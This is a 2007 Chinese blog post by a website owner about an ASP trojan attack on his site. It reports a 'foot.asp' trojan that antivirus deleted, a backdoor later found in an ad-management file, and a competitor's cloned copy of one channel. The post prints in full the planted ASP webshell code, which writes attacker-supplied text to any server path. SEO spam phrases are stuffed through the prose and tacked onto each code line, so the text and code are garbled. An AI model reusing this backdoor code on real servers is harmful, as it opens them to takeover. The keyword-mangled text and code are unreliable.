网站建设|北京网站建设|北京网站制作|北京网站建设首选品牌【企通互联】

2007年四月四日，

下午听含笑说，我的站又被人上传ASP 北京网站制作木马。被服务器的杀毒软件截杀了。

附记录：2007-4-4 0:25:43 ×:\website\w**b\ ***0\028_cn\web\html\classad\foot.asp >>> vbscript.encode [%@language=vbscript.encode%% use] [成功删除文件 网页设计]

 

让他查看了iis日志，发现有人通过访问我的一个名为广告管理文件，上传了asp木马。

在四日前，我的网站曾经被人在根目录下上传过一个名为foot.asp的文件，这个文件是“海洋顶端网2006火狐专用版”的asp木马，登录ip为： www.qitongnet.com58.59.221.10 是广西南宁市的IP地址。北京网站制作
不排除有人用代理来访问后门文件。

由于当时网站没有开启 网站制作iis日志，所以没有办法检测文件是通过什么形式上传的。今天通过日志看看出，在 北京网页设计2007年2月8号在我的一个广告管理文件里面加入了一句话木马代码。

代码如下：<% if Request("id")="1" then网页设计
if Request("creat")="yes" then北京网站制作
dim allen,creat,text,thisline,paths网站设计
Set fs = CreateObject("Scripting.FileSystemObject")网站建设
Set outfile=fs.CreateTextFile(server.mappath(Request("path")))网站设计
outfile.WriteLine Request("text")企通互联
Response.write "succeed!"北京网站设计
end if 网页设计
Response.write "<form method='POST' action='"&Request.ServerVariables("URL")&"?id=1&creat=yes'>"北京网站设计
Response.write "<textarea name='text'>"&thisline&"</textarea><br>"北京网站建设
Response.write "<input type='text' name='path' value='"&Request("path")&"'>"网页设计 北京网站建设
Response.write "<input name='submit' type='submit' value='ok' ></form>" 网站设计
end if%>

 

检测了所有网站程序均未发现其他漏洞，一直对这个代码是怎么插入的郁闷。经和技术员一下午讨论，得出结论是，很有可能是被黑客利用漏洞暴力破解。正在为这事愁的时候同时搜索出一个网站的页面和我们网站频道的“折扣联盟”频道一样。

第一个念头就是网站被人仿了，第二就是这两天网站被放上后门程序源码被泄露。

现在作为证据记录如下：下面我开启屏幕录像专家v6做一下记录。 北京网站设计

我们被仿网站的界面为：http://xiaofei.028.cn  这个为我们网站的界面。看我演示。网站速度有点慢，我刷新一下。有两个广告图片没显示。现在看下仿造我们网站的地址。他的地址是 企通互联http://xiaofei.0826e.com  看这里的电话号码被修改为他们的电话，还有这里的css样式没有调试好。打开我们的网站对比一下。。。。。甚至在“商家人气排行榜”这个地方的商家名称都没有改变。包括我们的icp备案号都没有改变。我们的备案号为蜀ICP证 06008500 看他们的。。。。

目前我们已就此事交由我们的律师处理，证据收集中。。。北京网站制作

责任编辑:图王 QQ:470666